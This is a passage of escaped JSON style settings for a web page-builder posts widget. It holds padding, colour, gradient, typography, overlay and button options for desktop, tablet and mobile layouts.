:true},\"hidden_wrap_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_background_active_background\":\"\",\"hidden_item_background_active_color\":\"\",\"hidden_item_background_active_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_color_b\":\"#f2295b\",\"hidden_item_background_active_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"hidden_item_background_active_gradient_type\":\"linear\",\"hidden_item_background_active_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"hidden_item_background_active_gradient_position\":\"center center\",\"hidden_item_background_active_image\":{\"url\":\"\",\"id\":\"\"},\"hidden_item_background_active_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"hidden_item_background_active_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"hidden_item_background_active_position\":\"\",\"hidden_item_background_active_position_tablet\":\"\",\"hidden_item_background_active_position_mobile\":\"\",\"hidden_item_background_active_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"hidden_item_background_active_attachment\":\"\",\"hidden_item_background_active_repeat\":\"\",\"hidden_item_background_active_repeat_tablet\":\"\",\"hidden_item_background_active_repeat_mobile\":\"\",\"hidden_item_background_active_size\":\"\",\"hidden_item_background_active_size_tablet\":\"\",\"hidden_item_background_active_size_mobile\":\"\",\"hidden_item_background_active_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"hidden_item_background_active_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_background_active_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hidden_item_background_active_video_link\":\"\",\"hidden_item_background_active_video_start\":\"\",\"hidden_item_background_active_video_end\":\"\",\"hidden_item_background_active_play_once\":\"\",\"hidden_item_background_active_play_on_mobile\":\"\",\"hidden_item_background_active_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"hidden_item_background_active_slideshow_gallery\":[],\"hidden_item_background_active_slideshow_loop\":\"yes\",\"hidden_item_background_active_slideshow_slide_duration\":5000,\"hidden_item_background_active_slideshow_slide_transition\":\"fade\",\"hidden_item_background_active_slideshow_transition_duration\":500,\"hidden_item_background_active_slideshow_ken_burns\":\"\",\"hidden_item_background_active_slideshow_ken_burns_zoom_direction\":\"in\",\"hidden_item_border_active_border\":\"\",\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_border_active_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_border_active_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_border_active_color\":\"\",\"hidden_item_border_radius_active\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_border_radius_active_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_border_radius_active_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"hidden_item_box_shadow_box_shadow_type\":\"\",\"hidden_item_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"hidden_item_box_shadow_box_shadow_position\":\" \",\"featured_post_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_content_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_content_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_content_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_background_background\":\"\",\"featured_post_background_color\":\"\",\"featured_post_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"featured_post_background_color_b\":\"#f2295b\",\"featured_post_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"featured_post_background_gradient_type\":\"linear\",\"featured_post_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"featured_post_background_gradient_position\":\"center center\",\"featured_post_background_image\":{\"url\":\"\",\"id\":\"\"},\"featured_post_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"featured_post_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"featured_post_background_position\":\"\",\"featured_post_background_position_tablet\":\"\",\"featured_post_background_position_mobile\":\"\",\"featured_post_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"featured_post_background_attachment\":\"\",\"featured_post_background_repeat\":\"\",\"featured_post_background_repeat_tablet\":\"\",\"featured_post_background_repeat_mobile\":\"\",\"featured_post_background_size\":\"\",\"featured_post_background_size_tablet\":\"\",\"featured_post_background_size_mobile\":\"\",\"featured_post_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"featured_post_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_background_video_link\":\"\",\"featured_post_background_video_start\":\"\",\"featured_post_background_video_end\":\"\",\"featured_post_background_play_once\":\"\",\"featured_post_background_play_on_mobile\":\"\",\"featured_post_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"featured_post_background_slideshow_gallery\":[],\"featured_post_background_slideshow_loop\":\"yes\",\"featured_post_background_slideshow_slide_duration\":5000,\"featured_post_background_slideshow_slide_transition\":\"fade\",\"featured_post_background_slideshow_transition_duration\":500,\"featured_post_background_slideshow_ken_burns\":\"\",\"featured_post_background_slideshow_ken_burns_zoom_direction\":\"in\",\"featured_post_border_border\":\"\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_border_color\":\"\",\"featured_post_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_box_shadow_box_shadow_type\":\"\",\"featured_post_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"featured_post_box_shadow_box_shadow_position\":\" \",\"featured_post_thumb_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_thumb_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_thumb_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"overlay_background_normal_background\":\"\",\"overlay_background_normal_color\":\"\",\"overlay_background_normal_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_color_b\":\"#f2295b\",\"overlay_background_normal_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"overlay_background_normal_gradient_type\":\"linear\",\"overlay_background_normal_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"overlay_background_normal_gradient_position\":\"center center\",\"overlay_background_normal_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_normal_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_normal_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_normal_position\":\"\",\"overlay_background_normal_position_tablet\":\"\",\"overlay_background_normal_position_mobile\":\"\",\"overlay_background_normal_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_normal_attachment\":\"\",\"overlay_background_normal_repeat\":\"\",\"overlay_background_normal_repeat_tablet\":\"\",\"overlay_background_normal_repeat_mobile\":\"\",\"overlay_background_normal_size\":\"\",\"overlay_background_normal_size_tablet\":\"\",\"overlay_background_normal_size_mobile\":\"\",\"overlay_background_normal_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"overlay_background_normal_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"overlay_background_normal_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"overlay_background_normal_video_link\":\"\",\"overlay_background_normal_video_start\":\"\",\"overlay_background_normal_video_end\":\"\",\"overlay_background_normal_play_once\":\"\",\"overlay_background_normal_play_on_mobile\":\"\",\"overlay_background_normal_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_normal_slideshow_gallery\":[],\"overlay_background_normal_slideshow_loop\":\"yes\",\"overlay_background_normal_slideshow_slide_duration\":5000,\"overlay_background_normal_slideshow_slide_transition\":\"fade\",\"overlay_background_normal_slideshow_transition_duration\":500,\"overlay_background_normal_slideshow_ken_burns\":\"\",\"overlay_background_normal_slideshow_ken_burns_zoom_direction\":\"in\",\"overlay_background_hover_background\":\"\",\"overlay_background_hover_color\":\"\",\"overlay_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_color_b\":\"#f2295b\",\"overlay_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"overlay_background_hover_gradient_type\":\"linear\",\"overlay_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"overlay_background_hover_gradient_position\":\"center center\",\"overlay_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_hover_position\":\"\",\"overlay_background_hover_position_tablet\":\"\",\"overlay_background_hover_position_mobile\":\"\",\"overlay_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"overlay_background_hover_attachment\":\"\",\"overlay_background_hover_repeat\":\"\",\"overlay_background_hover_repeat_tablet\":\"\",\"overlay_background_hover_repeat_mobile\":\"\",\"overlay_background_hover_size\":\"\",\"overlay_background_hover_size_tablet\":\"\",\"overlay_background_hover_size_mobile\":\"\",\"overlay_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"overlay_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"overlay_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"overlay_background_hover_video_link\":\"\",\"overlay_background_hover_video_start\":\"\",\"overlay_background_hover_video_end\":\"\",\"overlay_background_hover_play_once\":\"\",\"overlay_background_hover_play_on_mobile\":\"\",\"overlay_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_hover_slideshow_gallery\":[],\"overlay_background_hover_slideshow_loop\":\"yes\",\"overlay_background_hover_slideshow_slide_duration\":5000,\"overlay_background_hover_slideshow_slide_transition\":\"fade\",\"overlay_background_hover_slideshow_transition_duration\":500,\"overlay_background_hover_slideshow_ken_burns\":\"\",\"overlay_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"featured_post_title_color\":\"\",\"featured_post_title_color_hover\":\"\",\"featured_post_title_typography_typography\":\"\",\"featured_post_title_typography_font_family\":\"\",\"featured_post_title_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_font_weight\":\"\",\"featured_post_title_typography_text_transform\":\"\",\"featured_post_title_typography_font_style\":\"\",\"featured_post_title_typography_text_decoration\":\"\",\"featured_post_title_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_title_text_decoration_hover\":\"\",\"featured_post_title_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_title_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_title_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_title_alignment\":\"\",\"featured_post_title_alignment_tablet\":\"\",\"featured_post_title_alignment_mobile\":\"\",\"featured_post_text_color\":\"\",\"featured_post_text_typography_typography\":\"\",\"featured_post_text_typography_font_family\":\"\",\"featured_post_text_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_font_weight\":\"\",\"featured_post_text_typography_text_transform\":\"\",\"featured_post_text_typography_font_style\":\"\",\"featured_post_text_typography_text_decoration\":\"\",\"featured_post_text_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_post_text_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_text_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_text_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_post_text_alignment\":\"\",\"featured_post_text_alignment_tablet\":\"\",\"featured_post_text_alignment_mobile\":\"\",\"featured_meta_icon_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_icon_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_bg\":\"\",\"featured_meta_color\":\"\",\"featured_meta_link_color\":\"\",\"featured_meta_link_color_hover\":\"\",\"featured_meta_typography_typography\":\"\",\"featured_meta_typography_font_family\":\"\",\"featured_meta_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_font_weight\":\"\",\"featured_meta_typography_text_transform\":\"\",\"featured_meta_typography_font_style\":\"\",\"featured_meta_typography_text_decoration\":\"\",\"featured_meta_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_meta_alignment\":\"left\",\"featured_meta_alignment_tablet\":\"\",\"featured_meta_alignment_mobile\":\"\",\"featured_meta_divider\":\"\",\"featured_meta_divider_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_divider_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_meta_divider_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"add_button_icon\":\"\",\"button_icon\":\"\",\"button_icon_position\":\"1\",\"button_icon_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_icon_color\":\"\",\"button_icon_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_icon_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_icon_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_bg\":\"color\",\"button_bg_color\":\"\",\"button_bg_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"button_bg_color_b\":\"#f2295b\",\"button_bg_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"button_bg_gradient_type\":\"linear\",\"button_bg_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"button_bg_gradient_position\":\"center center\",\"button_color\":\"\",\"button_typography_typography\":\"\",\"button_typography_font_family\":\"\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_typography_font_weight\":\"\",\"button_typography_text_transform\":\"\",\"button_typography_font_style\":\"\",\"button_typography_text_decoration\":\"\",\"button_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_text_decor\":\"none\",\"button_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_border\":\"\",\"button_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_border_color\":\"\",\"button_box_shadow_box_shadow_type\":\"\",\"button_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"button_box_shadow_box_shadow_position\":\" \",\"button_hover_bg\":\"color\",\"button_hover_bg_color\":\"\",\"button_hover_bg_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"button_hover_bg_color_b\":\"#f2295b\",\"button_hover_bg_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"button_hover_bg_gradient_type\":\"linear\",\"button_hover_bg_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"button_hover_bg_gradient_position\":\"center center\",\"button_hover_color\":\"\",\"button_hover_typography_typography\":\"\",\"button_hover_typography_font_family\":\"\",\"button_hover_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_font_weight\":\"\",\"button_hover_typography_text_transform\":\"\",\"button_hover_typography_font_style\":\"\",\"button_hover_typography_text_decoration\":\"\",\"button_hover_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"button_hover_text_decor\":\"none\",\"button_hover_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_border\":\"\",\"button_hover_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_hover_border_color\":\"\",\"button_hover_box_shadow_box_shadow_type\":\"\",\"button_hover_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"button_hover_box_shadow_box_shadow_position\":\" \",\"button_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"button_alignment\":\"flex-start\",\"button_alignment_tablet\":\"\",\"button_alignment_mobile\":\"\",\"featured_terms_link_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"featured_terms_link_bg_color\":\"\",\"featured_terms_link_color\":\"\",\"featured_terms_link_typography_typography\":\"\",\"featured_terms_link_typography_font_family\":\"\",\"featured_terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"featured_terms_link_typography_font_weight\":\"\",\"featured_terms_link_typography_text_transform\":\"\",\"featured_terms_link_typography_font_style\":\"\",\"featured_terms_link_typography_text_decoration\":\"\",\"featured_terms_link_typography_line_height\":{\"unit\":\"em